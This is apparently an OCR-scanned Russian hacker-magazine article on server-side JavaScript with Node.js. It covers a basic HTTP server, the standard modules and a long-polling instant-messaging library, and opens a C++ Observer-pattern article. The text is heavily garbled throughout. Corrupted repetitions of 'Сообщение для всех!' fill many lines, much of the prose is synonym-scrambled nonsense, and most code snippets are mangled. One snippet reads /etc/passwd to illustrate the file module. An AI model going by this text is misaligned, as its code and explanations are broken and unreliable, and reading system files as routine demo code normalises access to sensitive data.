С ообщение д11Я всех! Сообщсtmе дJlЯ всех! Сообщс.tоtе ДJ1JI всех! Сообщение ДJ1JI всех! СообщСJоtе дпя всех!

си от темой, проце из самочки другими словами от оздания НТТР -се рверов б е зо на от ваш покорный слуга для да х брау­

Сообще1оtе к всех! Сообщсtmс к вссх! Сообщение АЛЯ всех! Сообщеtоtе дпя всех! СообщСJоtс д1U1 всех!
С ообщсшtед,nя всех! Сообщениедпявсех! Сообщеtmеддявссх! CooбщcJoteд.nJI всех! СообщеJmедпявссх!

зеров да во любом окружении.

С ообщеtmс д.ля всех! Сообщеtmс дпя всех! Сообщение ради всех! СообщСJоtс А11Я ВCCJt! Сообщеtоtс дnя всех!

Чтобы было понятнее, подождите возьми код, некоторый со з ей-ей вместе с тwеЬ ­

~

С ообщсtmе к всех! Сообщение ДJ1JIIICCX! Сообщсtmе дпя всех! Сообщеtоtе дnя всех! Сообщс.Jше ддя всех!

С ообщсшtе д11Я всех! Сообщсtоtе интересах вссх! Сообщешtс д11Я всех! Сообщсtоtе дru1 всех! CooбЩCJDIC дпя всех!
СообщеtmеДflЯ всех! Сообщсtmсддя всех! Сообще~mецпя всех! CooбщCJoteДJ1JI всех! CooбщctDfCWUIВCCXI

вместе с ерв е р, э доровающий вместе с автор со что до мной:

Сообщение ДJ1JIВCCX! Сообщсtоtс дпя всех! Сообщсtоtс дпя всех! СообЩСJоtс д1IJI всех! С ообщсJmе дпя всех!
Сообщс1оtс дпя всех! Сообщеtmе A11J1 всех! С ообщсtоtе дпя всех! СообщСJtнС wвссх! COOOщcJot:C дns1 всех!

var http=require (" htt!Ll.,_
·-------------!tl: tp.createServer(fJ,Jnctioп (reg).!_g~t , respoпse)_{__
respoп_se.writeHead( 000, {~пtепt- TypEt" : " te x t / plaiп " });
rеsропsе.епd(" Привет, Кононенка!
}).listeп( 00~,

" );

"127.0.0.1" );

Сообще1mс ДЛJ1 всех! Сообщсtmе АЛЯ всех 0СообщсtоtС АЛЯ всех! CooбщeJDIC д1U1 всех! Сообщсtоtс дпя всех!
Cooбщctnte пользу кого всех! Сообщеtоtе дпя всех! Сообщение цnя всех ! Сообщение Alll всех ! СОООщсние мя всех!
Сообщение в целях всех! CooбЩCIDfC дпя всех ! С ообщсtОJС АЛЯ всех! Сообщешtс дпя всех! СообЩСJОfе дпя всех!

Сообщсtоtе .U.."lЯ всех! Сообщенисд.11JI всех! Сообщеtmс дпя всех ! CooбЩCIDIC дпя всех! Сообщсшtс цпя всех!

Вэrnядсостороны клиента

coпsole . log(.:Ц~ зanyJYgJ:LЬtt ~L1П.0 . 0.1:8080L)_;_ _ _ __
returп

А вотта ко ты да я е го з апус тим:

Math . PI • r • r;,__________________

}_;
exports.circumfgreпce=fuпctioп

% поdе

имя_файла_скрипта.js

~ервер запущен

http :l/127.0.0.1 :8080/

returп

(r)_ {

0 • Math.PI • r;

};

По н ятное профессия , аюшки? взамен прив е тс т на ия м ожно выдав а ть <html>
<head ><title>... следовательно кроме . ;! Кроме бы ст р ой отдачи з абавны х привет­

из на по части его модул моя особа я опр е д е ля ем во н е м любы е из вои методы , которые

от твий да со татичной на е р со т для да м ожно провести в жизнь практич еск равным образом почто угодно!

по мнению не без; л е будут до самого из тупны извн е lагеа равно от iгс umfегеп из е-в примереl . Во от ­

<< Какой быстрой? Ява вместе с крипт- сие ж е медленно! » - во со помнишь

Зде вместе с ь на не без; тр е ча ется вто р ой гл насчёт бальный об бъ е кт-ехрогts. Внутри

пользуем от моя персона э тим модул е м:

твоя милость равным образом будешьотчасти прав. Но да туточки автор могутебя порадовать! В кач е стве
Jа vаSсгiрt-движ ка на

Nod e используется непр е взойденный г угловскийV8,

а м одель ввода/выв стихотворение изумительный внутренно вместе с тя х равным образом от ключительно а из ан х ронная .

var circle=reguire(" ./ circle.js" )_;
coпsole . log{_:_oдQ]цi!.!IJLI~J>YГi!_~_pМ!!)Icoм

0 р_авна %d " ,_ _ _ _ __
circle.area (1)_)_; _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

Вм yes те этодаетбл е стящую от коро из ть, достойн у ю ваша сестра вместе с по отношению конагруже нного
се рви от а . До для азатель ст во в отношении м э тогоявля етс автор то, что-то не кто иной в Nodeyжe

усище пешно реализован сервер обмена мгн в рассуждении венными сообщениями в

Чтобы выве не без; ти форум кр у га бери экран, наш брат пользу е мся третьим

<< В Контакте >>, а уже в некоторых местах , а тама погрузка ого - го. К слову, одну крошку похо­

глобальным объектом -console, предназначенным для того вывода во

жий из ервер автор равным образом н а пишем, хотя вначал е н е целый ряд мануальн что до й те ории .

stdout равно std eг г. Метод log[l- этo ргiпtf-подобный рецепт [Классически й
фор м атир касательно ванный нравоучение во Ja v aS c г i pt- этo не без; ча из ть е. - При м . р е д.l

НОВОВВЕДЕНИЯ В

NODE

в целях вывода во stdout, мето д е гг по отношению гll-то ж е са мое в целях s td e гг. По из л е период й

Первое, что-то могло бр ос ить из моя персона во гла з а во прив еденном больше не без; смещение те,-

интере не без; ны й гл об бальный объ ек т- э в таком случае

сие require. Н хвала во се интересненькое равно гото во е нькое !то йес ть примерно все!

инспектирование по-над исполнением т е кущего процес со а. Воттолько нек что касается торые

process, д а ющий нам полны й

-де ржит на специальны х модуля х . Именно равно х равно подгружа ет планетарный оный

изо его методов равным образом объек т ов , которые совершенноточно пригодят от ваш покорнейший слуга присутствие

метод. Часть модулей написаны получи С++ не без; либ а ми V8, ча из ть непосредствен­

паче иначе говоря м е н е е серье з ном программировании из ерв е ра :

а бери Ja vaScгipt "e . Само от тоятельно JS-м одуль предпринять оч е нь прямо-таки :

process.stdout, process.stderr равно process.stdin- потоки вместе с тан­
дартного ввода/вывода. Для первы х дв ух способ wгite во растопырки , равным образом

Haw

мо.gуль

circle.j.,._
s_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

п об лучитс автор этих строк c oпco l e . l o g равно от оп s оlе . еггог, а во методика std iп - этo у ж е

инт е ре не без; нее . Nоdе-платформа событи й же - ориентированная,

exports.area=fuпctioп (r:L.t -- - - - - - - - - - - - - -

а не без; ан х ронн а автор . Поэтом у дляпол у чениястандартноговводаопреде­
ляется простая выражение ко из обытию :

poll ingtest: xoker kononenko$ sudo node server . js
соединений!

_ J:!.rocess.stdiп.oп(" data " , fuпctioп (chuпk)

Отсылаю сообщение!

01

Отсылаю сообщение!
Отсылаю сообщение!

_ _process . stdout . write ("d ata:

Отсылаю сообщение!

_

})_;,

Отсылаю сообщение!

{ ___

_

печатаем высуженный эмблема

____

+

chuпk) ,_·-------~

.

Отсылаю сообщение!

Функции, которые указываются на кач е стве аргумента, - э ведь

Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!

Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!

саiiЬа вместе с k-фу нкции. Они вместе с рабатывают пр да некотором событии . В
э том,к вместе с тати,ився су ть со обыти й нойориентир что до ванно из ти , же э тоты
во от е пр ек расно знаешь .

process.argv- ма из сив

из аргу ментами командной из тро для и, заданны ­

ми рядом запуске .

Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!

U

печатаем ар сументы

_grocess . argv.forEach(fuпct:ill!L_(val,_io dex,
coпsole.log{iпdex

Вэrnядсо стороны сервера

ХАКЕР

00 / 053/20 01

array)_ {

+ " : " + val)_;,_ _ _ _ _ _ _ _ _ _ __

_ })_;· - - - - - ·

005

КОДИНГ

process.cwd()- рабочая правительство процесса.
process.pid, process.getgidll process.getuidll -текущий id процес­
са, а да

gid равным образом uid.

СТАНДАРТНЫЕ МОДУЛИ

NODE

process.kill(pid, signai="SIGTERM") -убьет организованный процесс.
process.exit(num)- завершиттекущий эксплуатация . Кстати, дело
завершения допускается отследить, зарегистрировав соответствующее

а лес модулей

событие:

нииоченьбольшогоколичествасофта .

Node.js удовлетворяет потребности около написа­

Смотри сам:

functiQD_()_{______________________ _
___ __hQ_~ole.lP.gC.f.L.:U1ю ••• та_~g_,_._ ,~.); _____________________ _
_RJ:Q.!:_g_~~.QпCe-"\.lt~,_

---

• fs- модульдля работы не без; файловой системой. Есть методыдлялюбых
операци~отчтенияизаписидосозданиясимволическихссылок.

_}) ,_
·

Прочие глобальные объекты равно их методы ранее нетакие интересные,

зато что-то интересно, где-то сие модули, которые не возбраняется прикрутить ко
Кэтому моменту твоя милость долженствует соверЦJенноточно понять, что такое?

Node.
Node.js

____fhr eac!File(_"/etcLRasswd ", function (grr, datg_)_~.--_ _
__if___(err:) throw err;
___hQ_nso.lg_,_:),Qg_(data);___________ _
_ }.);

____

-это эфемерно круто. Я, например, вспомнил, что такое? всю дни всего
да мечтал, сколько настукать родной веб-сервер! И кроме каких-нибудь вслед за тем

crypto- криптографические методы: хэ ширование любыми ал­
горитмами [sha1, md5, sha256, sha512 да т. п.), конвертация данны х

унылых СGI-скриптов, а со сокетам да , пустьдаже «веб»! Теперь сие быстро

и, собственно, что ни попадя зашифрование .

реализуемо.

net- устройство чтобы асинхронной
БИБЛИОТЕКИ ДЛЯ ЭМУЛЯЦИИ
СОКЕТНОГОСОЕДИНЕНИЯ
Мгновенность сообщений нашего сервера будетзаключаться во том,
который сведения в кругу пользователями будут представляться минус задержек

во стиле гeal-time

web . Обеспечиваться

сие будете через эмуляции

постоянного сое динения сб ра узером.Самаясове ршеннаятехнология,

работы со ТСР.

_____________________
v а r s е rve_r=lle:t.-".reil.:t.e.$_e_r_v_e_r.{f_u n ctiQП_(_(:_)_{ _______________ _
__cд~.r.ite.Cмl:J,Q\r\~);, _ _ _ __
__c_.J2ip__g_(.(;); _ _ _ _ _ _ _ _ __

__}.);

постоянноедвухстороннеесоединениесбраузером,ксожалению,
поддерживается лишь новыми браузерами. А свой имеющий быть сервер
приходится суметьдать истовый реалтайм-веб любому клиенту! Для

создания реалтайм-веб-приложений существует бездна различных

UDP- равным образом другими датаграмны­

events- пользу кого реализации своей событийной системы.
util- ассортимент полезных методов: форматирование строки,

Очень популярная комната

Soket.IO порадует красивым ди­
зайном главной страницы проекта http:Usocket.io/ равно приличным

при­

нудительное юниорат .

лать ради вас. И она, конечно, делает. Поддерживает кучу способов
соединения: ото новы х веб-сокетов перед вечны х айфреймов. Новая

работы со

ми протоколами .

решений , хотя для того нашего случая их просто-напросто ничего:

счетом плюшек да свистелок. Она обещаеточень многое от де­

dgram- с целью асинхронной

tls-имплементация

OpenSSL, так

естьудобные SSL-соединения

к твоих программ .

vm- виртуальная JаvаSсгiрt-машина, т. е.

устройство чтобы запуска равным образом

вариант позволит поднимать серверные события, сопровождае­

компиляции [eval сего никак не умеет) js-скриптов в середке своей про­

мые данными. В Сети несложно гуглится горка тутариалов да примеров,

граммы.

описывающих то, равно как каста публичка удобна равным образом крута.

Гораздо не так популярна [а зря!) комната Beseda, которая
делает эталонно так а самое, при всем том имееттолько репазитарий получи

заезд хабе [goo.gi/9SoJR ). Она поддерживает гуттаперчевый соглашение Bayeux

---·--------

__ _j.J_~;i.д gscr_ipj:_, eval.eJI.,____ _
___v.m-=-.J:_e.g uire (_"_vm ") ;____________________________________ _

итриспособасоединенияссервером .

_ using~J; riRt=vm.runiiJI!:!j.sContext Cl_ocalm__=..l; ~-------___"my__fil~vm."_); _ _ _ __

Достоинствомобеихбиблиотекявляетсят~чтоихдействительно

console.lo_g_(" localVar: " + localVar +
", usin~c.r:.!Rt: " + u_~.io.gscr:.!P-1);_________________
__iLloc alV_ii!:~-~-n_.__ using ~cr.iQ!_: 0

легкоиспользовать.Правда,Sоkеt.IОпло хоработаетсо всемиспосо­
бами поддержки соединения, сверх того веб-сокетов. Также случаются
прибыль памятиинеобъяснимые падения сервера около про

небольшом количестве клиентов [более 0000). А вона Beseda без участия веб­
сокетов отлично справляется равным образом из

00 000 клиентов. Да

dns- резолвинг любы х записей [М Хи т. п.) .
http, httрs-добротные да быстрые реализации wеЬ-серверов.
child_process- произведение от дочерними процессами, фор к, ехес,

spawn равно т. n.
os- все, аюшки?

равно из веб-сокетами

симпатия работает соответственно юрче .

НАПИШЕМ ЛУЧШЕ!

нужно с операционной системы.

Чтобы кризис миновал дойти собственным умом на новую технологию, всякий раз небезвыгодно нафантазировать
велосипед. А особенно хорошо, кабы аквапед довольно быстрый.

_ Как показал муж компетенция работы из

Node.js равно

JavaScгipt, нежели проще­

тем быстрее. Поэтому даже если с целью реального применения своя библио­

Есть снова громада да стандартных модулей, равно нестандартны х, написан­
ных сторонними разработчиками: с модулей в целях работы MySQLдo
полноценныхвеб-фреймворков.

тека можеточеньдаже сгодиться. Состоять наша библиотечка хорэ
с одного файла

io.js. А ради

проверкии отладки сызнова двушничек -сценарий

сервера serveг.js да период клиента iпdex.html.

Самым универсальным способом защищать постоянное соеди­
нение не без; сервером является lопg-роlliпg-соединение, благодаря тому пользу кого на­
чала реализуем его. Нам важно, чтоб свой сервер был в состоянии покровительствовать
кучусоединений,нетекинетормозил.
После долгих равным образом упорных ковыряний во исходниках, отладки равным образом
профилирования

Soket.IO

источник падений равным образом тормозов, в отношении которых

моя персона говорил выше, была найдена! Это тайм-ауты, обрабатывающие

006

В КАЧЕСТВЕ JS-ДВИЖКА
В NODE ИСПОЛЬЗУЕТСЯ

НЕПРЕВЗОЙДЕННЫЙ
ГУГЛОВСКИИ

V8
ХАКЕР

00/153/2011

JavaScгiptдля сервера

Процесс разработки

каждое сочленение вместе с клиентом. Каждый асинхроичный цикл, под­
держивающий логику обработки lопg-роlliпg-соединения, ест мно­
го ресурсов . Поэтому потребно вложить много сил уменьшить целое на одиночный цикл. Для
сего каждое комбинация представим << плоским >> набором данных,

01 ... равным образом имеет материал либо_долго висит бе3 состояние
__if_(gollingData.dataOueue .le..ng-""t!!..
h _ _ _ _ _ _ _ _ _ __
___ LJ_gollingData.loogCount --- е)_ _ _ _ _ _ _ _ __
flush(polliпgData); //_,_,..&Q paQ>Iвaeм ег_
о_ _ _ _ _ _ _ _ _

какой-никакой полноте кормить информацию об том, на который одну секунду его

}

никуда не денешься обнулить, отправив предмет клиенту. Для сего во
файле

io.js напишем ниженазванный адрес :

//_ИJ:j_Ig!H!.<t!J_ПP.9~1Q! .. Ji!lill!ЧИЯ HQ!!.Ь.llUiaHHЫX,_______

var CHECJCI_NLERVAL

LL

=188~;

Максималь~ьнQ!:~ че~Т!!о_ итераций перел

01 обя3ательным "брасом
var MAX_LOOP_CQ.UNT=18; _ _
/LJабдица соед!1.!!ений
_ _ __
y_ar coпnections- {};,___________________

}
}

fun ction flu!;h_(gollil}gDa.ti!)_{_ _ _ _ __
goll i ngDa t _g_, r e..s.QQ.O se ,_r,ш..Q.(g относительно ll i ngDa t а . c!i!...ti!.QuJ!. u. e...j.Q.iп.C..J~))~-_gollingData.dataQц_eue
polHngQata . r_e~pQПse=

=[].;____
nul..l;

}

setinterval(mainLoopiteration, CHECK_INTERVAL).;_
Каждуюитерациювсесоединенияпроверяютсянаналичиедан­

ны х или — или для безыскусный . В случае, коли во комбинация пришли факты либо,

LLlli!..tili\ill!__cQ.eA.инeния
va c..J,.Q_ngPolli..ogQilj:a=function () {
thi!;_.IoopCounj:=MAX_LOOP_COUNT;
this .dataQueue....=[];
_this . resgon~e=nuЦ ;, _ _ __
};

_________·----------------·---------------

Ll

Итера~я основного ~~л~a~-------------­

f u..o.tli.on mainloogiterjltj.Qll.()_{
var pQllingDat!l;
fo c_(var id in щnne ~tjon~) {
J ollingData=connectipns_[idj; --·-- _
_ _ _ __
_jf_(gollingData . resgonse)_{....LL Если клиеi:!LD.Ql!""к.!.!л."_
юч
""е.,н,__ __
_ gollingData.loogCount--:~·----------

ХАКЕР

00/153/ 0011

наоборот, сыздавна ничто безвыгодный приходило, житейский требование обрывается от

отправкой данных . После почему клиентела потребно направить новейший запрос.
Практически библиотечка готова! Теперь необходимодать возмож­
ностьклиентуполучатьсвойидентификаториобрабатывать • вековой »
вопрос данны х, а в свою очередь записыватьданные на соединение.

var lastiD=е;....LL..Идентификато ~СQ соед,.,и""н"_
ен
шишя,______
01 Ре.Qi страция клиента равным образом В~I!Раl!!.ение его идg_нтифи_к_;tiQРа __ _
var init=exports.init=function (req]J!!st, resgQП_se) {
var id="connection_" + ++lastiD;
_connections[id]=new LongPoll_ingDataJ)_;_ _ _ __
~gonse . end(iQ)~.------------------};,

_________________________

007

КОДИНГ

.L~ржание» зan_I)QgJ_Д2!fHЫ>\.S.QМJ!_t-!!~.!i!"!.!L ___________________________ _

YQrШtd_=е КP.Qrt 0 ._h по части 0d

=f

цn ct i оп (iQ,_r_g_g_
y_e5t

_y__ш:_ J2Q.l.l:ingQ.~ta=connection~(_:i,_cj_J;
_j._U pollingl:)ata._re_~poд5e l==_n.JJl l) _ _ __

, __re 0ро n5 е) __{_ ______ _
-----------------

_ fly~b(p_o_1_lingQat_a); - - - - - - - - _12Ql1ingDat~~PQ.IlS.e --=._c_gspQD5~;
___________ _

ТИПЫ ПОСТОЯННОГО СОЕДИНЕНИЯ
С БРАУЗЕРОМ

_pq_l_]jngQ.i!ta .1oopC.Qцnt_:;.l"U\_~_!.QQP_hQ_UШ.; ____________________ _

а нынешний моментсуществует

};

nять способов поддержки постоянного

LL_~;m-~-~.!>..д~J:iHЫX...e.J&eШШg_I:J]"!_e_ ____________________ _

соединения от спринклер ром:

_________________________________________

y_ar wr.ite_.::_eXPQL:!:5. wri te_::..f~ n ~ tio o_(j__Q, __g_a_ta) _{__ ____________ _
var polliQgD__g_t_g=_<;Qnn_e_ь tion5[i_9);
______
_pollingQaj:_;;~_._cjataQueue.pu5h( new Buffer_(datь_tgSj:ring_())J; _ _

______

}

WebSocket"ы- осуществимость новы х браузеров подкреплять со­

кетное комбинация согласно протоколу НТТР.

FlаshSосkеt"ы-эмуляция WebSoket"oв быть помощи специальной

·----------------------

флешки. Способ возможентолько около наличии флеш-плеера.

_______________________ _
y_gr__!1.r__g.a_9 от а 0t=е х ро rt ~ Ь ro а d не без; а 0t _::_ f un c :tj,Q!l(cj_~tg)__{ ________
_fQL(y_g.r_j__!:l_ j n conд.e..GJQ~) write (;i.,Q_,_qg_t_g); __________________ _
LL_1_gnиcь данн~х._е~~;_е coeдюt.e.~_l:t!L

Long роlliпg- « долгоиграющие >> требования . Способ ,

какое-то промежуток времени прежде появления новы х данны х, задним числом зачем отвечает да

----------------

}_

присутствие котором получи

ординарный НТТР-запрос сервер далеко не сnешит отвечать, а удерживаетего
закрывает соединение. Также возможен вариантсjsоnр-форматом
ответа. Способ поддерживается всеми браузерами.

Чтобы использовать в своих интересах нашей библиотекой, используем еще

Multipart streaming- дозаписывающийся

знакомое речь гequiгe:

отзыв сервера. НТТР­

запрос, кто можетчитаться отнюдь не закрываясь. Поддерживается

.Y<!.L_i.Q_=

всего лишь Fiгefo x "oм .

reg_yJ.r.e_( _"_,_Lmy_ьg ol ]j.Q.rgryЛQ,j_~ )_; _______________ _

iQ,Ь.roadca5t t_o pj!_~p<!.~!:i_O_e __~_QQYI!lli~ ;_______________ _

Forever lfгаmе-вечный айфрейм ,

на некоторый дописывают ся новые

порции данны х. Способ поддерживается всеми брауэерами .
Теперьдавай попробуем нашу библиотеку взять на вооружение относительно
центральный цели статьи, ведь естьдавай сейчас напишем се рвер мгновенных

сообщений. В файле seгveг.js запишем:

0.?_cr:i,pt> ----·--------------------------------------Y.МS..QD.e.c tioniD ;___ ______________________________________ _

va r htlp_:_reg_цir..e..Ciltt.Q." l, ______ _
_ fs ...:;..r..e.g uire(~)_,
_ iQ=__r_e.quire_(_"__. Li o .j_s" ); _L/_нaшa! _
Y<!L~r_y_er

=httP. .cre_ate.s.e..c.Y.er-0;____________________ _

serve.r,_;~_9_9_~_ьtener.Cr eq!,J~$_i~,_b.an.91eftg_g_ц_e_~_t)_; ___________ _

~r ver .lj,5teJJ.(!~,__"], o c alЬ.9.tl.~J;

function connect_()_{ __
_$_._J105t( :".htlR;_Lf.)..Q ca1host /..::,_f_unctio o_(dat;J.) {
_____________________________________ _

_ p_Ql_l_(_)_;__ _______________________________ _

_______________________________
__________________________________________

_});

_______ _

}_

f unction hand_leReJ!Ue5t(regue5t,__r_e.5pQD5e)_{ __
i f (regue5t.method .===-~EOST" )_{
_ _ _ _ _ _ _ _ __
""-- io~ tд!.t_(r.e.gue5j:_,__r:g_s_pgм_g); _________________ _

_}_E!l .?_e__{_ ________________________________ _
__i f (Г__е_q_у.е~:!;,ц.r1===- -"L:__Jj_r_g_g ue 0t . ц.r_1__:о_:;_",_:д nd ех . ht m1" )_{ ___ _
function _(er_r,__content)__L _____ _

~~dFile(_"_,_/j_nqgx.J)j:_m 0" .

~129~~ en_c:!_(.~ontent);

functio n hand1eData(data)_{
data=data~-~P1Ш."..I."..).;
while (.c:tgj:_q~J,ength > 0)

---------------------__j_CQQ_gy~),.a_J:!pen_ci.(gata. 0hift()_.±....".}p~)_; _______________ _
_pgll()_;_____ _
}

______

_ });_
}

е15 е

{

__ j _g_,bgJQ_(r.e.gy_e_5t
____}_
_}
}

.ц.rl,_s_p1il.CL)_,_pQp_(),_r..e_g_y~_$j:,_r e 0 p_Q.!l~.el;_ _

------

_________

-------

_______

funct i o_o_poll(_)_{ __ - - - - - - - - - - - _$_._get ("h1;_tQ.;./.L 0oc 01tш.li/..:...t._conectJgдJJ), _lJшl!i1e.Oata);______ _

_____________________________________

}

-~J]_o_~_t();_____
0_L 0criR~
tL
>

!L Кто-то

----________________________________________

всех многократно

0e:!;Interv~_(fцш~_tion()

___________ _

Вотвесьнеоб хо димый рабочийскелетдля сер верамгновенных

соn5о1е.,]_Q_g( "Отсылаю не без; ообшениеl".)_;,_________________ _

сообщений. Пока спирт умеет на реальном времени распределять по всем статьям со­

iо,Ьrоаdса5t( "Сообшени е с целью весь х !" ),_,_·_ _ _ _ _ _ _

общения, впрочем но у него аспидски большенный потенциал. Несколькими
строчками дозволено полноте посоветовать свой сервер, например, обменусо­

}_,_500);

общениями в кругу пользователями не в таком случае — не то работе вместе с базой данны х - во
POST-зanpoc бросьте восnриниматься нашим сервером на правах регистра­

общем, чему угодно.

ция нового клиента, а GET-зanpoc вида <</и дентификатор_к лиента >>
хорош воспринят как бы « долгоиграющий >> запрос. Ну а ради эмуляции
интерактивности каждые

000 миллисекунд хорошенького понемножку откомандировываться сообще­

ниевсем пользователям .

От клиента ожидается, ась? некто достаточно регистрироваться, хранить

выво

ы

Можно совершенно уразуметь , благодаря чего Node.js приближенно аллегро набирает популяр­
ность, фригана ра от тет, а библиотеки плодятся что хом ячки .
Еще бы, так-таки в настоящий момент каждый, кто именно хо ть небольшую толику наслышан от

связывание да переподключаться. И никаки х специальных клиентских

Ja vaSc гipt"oм , может подсчитывать себя серьезным системным программи­

библиотек. Что, кстати, в таком случае а дозволительно счесть по образу грех описан­

стом! Каждый в настоящий момент сможет оборотить унылую статику на захваты­

ны х больше библиотек.

вающую интерактивность, а может вверчь растущие nро ек твоя милость на

Клиентский шифр напишем неуклонно во index.htm! {заранее подключив
jQueгyl:

008

пучину вместе с пагетти стих из каскадами замыканий да заворотами асинхрон­

утнапиштим логики ... Будем мнить получи лучшее . :Х:

ХАКЕР

00/153/2011

КОДИНГ 0 Т1 PS&TRICKS

deeonis ldeeonislagmail .coml

Паттерн
проектирования

На блюдател
Продолжаем смык не без; паттернами объектно­

редставим ситуацию, аюшки? нас взя л равно бери работу во крупную фирму,

ориентированногопрограммирования . Сегодня

терногожелеза . У них е вместе с ть энский водитель , кто отслежи­

котораяразрабатываетсофтдлямониторингаработыкомпью­

пишущий сии строки узнаем касательно паттерне « Наблюдатель», некоторый

ваеттемпературу процесса, обороты

облегчил бытье многим 00-программистам .

пр очую информа ц ию. Н а ш а назначение получи 3 сать клиентскую доза софта,

HDD, температуру видеокарты

равным образом

ту, которая работает на гiпg-3 равно выводитэту информацию п ользователю

Любая система, работающая во режиме реального

на режиме реального времени. Причем список должна никак не п росто

выв по части ди ть ан фуй на кучу, а изображать ее н а разных <<экра бери х>>. То сделал ть

времени, на праздник либо некоторый степени может исполь­

по части д инмодульклиентскойчас т изанимаетсяотображениемсостоя ни пишущий эти строки

зовать настоящий паттер н, да отчего его познание да пони­

центрального процессора, новый модуль-графического пр оцессара

мановение прямо-таки необходимолюбомууважающему

равным образом т. д . Д а равно во вкусе оказалось, н а ш е новое вождь решило замах н уться
в мировое империя равно хочет, в надежде софтбыл расширяемым , ведь убирать

себя кодеру.

воеже сторонние разработчики могли формировать приманка мо д ули .
В детородный орган ото нашего пр е дш ественника нам дос тался ко ла сс
System lпf o, каковой на теории пр едназначается в целях сбора инфы об систем­

ном железе равным образом оповещении клиентской части об изменениях на состоянии

ObservaЫe

порцион работы согласно коммуникации класса Systemlпfo от клиентскими модул я­

ConcreteObservaЫe

-observers: Observer[]
+дddObserver(o: Observer)
+RemoveObserver(o: Observer)
+NotifyObserv.er()

Первоначальный 0!J1риант класса

что до ..

* ..1 «interface>>
•1 Observer

00 / 053/ 0011

class
_{

0

ConcreteObserer

0

+HadleEvent()

Systemlnfo

Systemiпfo()

_______

0

~

HadleEvent ()

у каждого наблюдателя

ми легла получи ваши рамена . Для началадавай взглянем, почто у бери не без; есть.

«Наблюдатель»

Observer)
+RemoveObserver(o: Observer)
+NotifyObserver()

ХАКЕР

хоро ш о, так вторую возлюбленный т олько начал реализовывать, равным образом поэтомуосновная

классов паттерна

+дddObserver(o:

Вызывает технология

зтогоже л еза. Если вместе с п ервой ча стьюуше дши й с фирмы коде р со пр а вил ся

Диаграмма

« interface»

0

_.fi_Q_at getCPUTemr.IO;
float getGPUTemp();
int getHDDSpeed();
_y_oid~OQt_ifyЛients() ;_

0

009

КОДИНГ /TIPS&TRICKS

Методы

getCPUTemp, getGPUTemp равным образом getHODSpeed предназначены

ради получения информации ото др айвера. Там всё просто, равно позтому они

Интерфейсы

Subject равно Observer
class Subject(),___ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

работают вроде часы. Та кже есть мето д пotifyCiieпts, коток орый, суждение моя особа объединение

:(

комментам ва ш е го пр е дш естве нника , д олжен касательно п овещать клиентские

puЫi c:

void registerObserver(Observer &obs)=е ;
void removeObserver(Observer &obs)=е ;

модули об изменениях во помогите тоянии сис т емы . Этот средство вызывается

гд е-т по отношению во земные глубины х класса System lпf o. Как з т по отношению д е ла е тся, н ам со на сем н е
важно, гл а вн ое то, чт по отношению пotif y Cii e пt s срабатывае т возле каж д ом апдейте
инфы об железе равным образом клиен т ские модули пунктуально нич его неграмотный пр создание т ят.

protected :._ _ _ _ _ _ __
void notifyObservers()-=-e;

НАЧИНАЕМ КОD,ИТЫ
Для н ачала нам нужно от д ела ть три основных модуля, которые
отображаюттемпературу пр оцессора, температуру видеокарты да
живость вра щ ения

HDO.

Мы ранее знаем, который с целью насчёт п овеще н ия кли­

ентов используется ипостась пotifyCiieпts, равным образом шарик н о, н а д касательно
недавно изображать ан фи изо сего метода нашим модулям. Их у нас,
кстати, доколе только три:

cpuTemp, gpuTemp равно hdd Speed. Каждый с

class Observer()

{
puЫic :

void update (float t_cJlli,_f!g at t

}___________________

gJlli,~hdd)=е,.._·_ _ __

сих модулей долина а н уме ть приобретать д а нны е через Sys t eml пfo , по части э книга у

Методы гegisteгObseгve гll да гemoveO b se г ve гll служат для того до­

стержневой разновидность реализации пotif yCiieпts, некоторый около хо дит на голов у,
выглядит приближённо круглым счетом :

ба вления /удаления бери блю дат е л ей с сп да ска подписчиков . Функция

пot i fyObseгve г sll короче объявлять наблюдателей, а средство upda tell
Peaлизaция_ notifyClients(),___ _ __

интерфейса ОЬsегvег буд ет убеждать сии по части повещ е ния . Те п ерь

void_Systemlllfo()_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

подправим наши классы: System lпf o,

Cp uTemp, GpuTemp равным образом Hdd Speed.

{
float t_cpu=getCPUTemp();
float t_gpu=getGPUTemp() ;
int s_hdd=getHDDSpeed();
_ cp uTemp. URdate(1_@Q,_j;_gJ2!!,_s__hdd);,_ _ _ _ _ _ _ _ __

Реализация классов

class Systeminfo()
puЫic Subject
guЬlic :
reg is terOJ:J~grver( Observer

y pid
{

gpuTemp&pdate(tsJ2!!,__1_gJ2!!,_s__ hdd);
hddSpeed .updat e(t_cpu, t_gpu, s_hdd);

01
01

&obs)_ _ _ __

код, добавляющий ссылку бери наблюдателя
во оглавление либо конгломерат

Чт по отношению тут, собственно, отнюдь не приблизительно ? Во-первых, основ ным принципом
пр оектирования от п омощ ь ю патт ернов является программирова­

ние для уровне интерфейсов. В нашем но случае ранг Systemlпfo

void removeObserver(Ob server &obs),___ _ _ _ _ _ _ _ _ __

д олже н з н ать подробную информацию что до каждом клиентском

{

01
01

мо д у л е. Это, возможно, было бы приемлемо, если бы бы цифра мо д долбленка
было фиксированным, хотя наш брат пл а н ируем п остоянно увеличива ть их

код, удаляющий ссылку нате наблюдателя
во прейскурант не так — не то конгломерат

количество, а сле д ователь н о, такого типа подступ создаст кучу неудобств,
а опосля равным образом ошибок. В касательно -вт орых, п ара метры, передаваемые

функциям updatell, беда смахивают для интерфейс взаимодействия
посреди

Sys t eml пfо

равным образом ко ли е нт ским равно мо д улями, н в отношении таковыми неграмотный явля­

ются. Н у равно в-третьих, до этого времени сии вам зо ваша милость ме т относительно д ов upd atel l -этo пере­
м е нн ая ч асть кода, которую н полоз н в отношении инкапсулировать. Исправле н ием

protected :
void notifyObservers()

эт равно х н е д остатков автор данный ча из равным образом займемся.

{

01

код, воспламеняющий способ

_Ll_для ка)l(,!lо_r_о_обьекта

Е сли твоя милость выписываешь н аш журнал, в таком случае тебе еще наслышан альтернат работы

_}

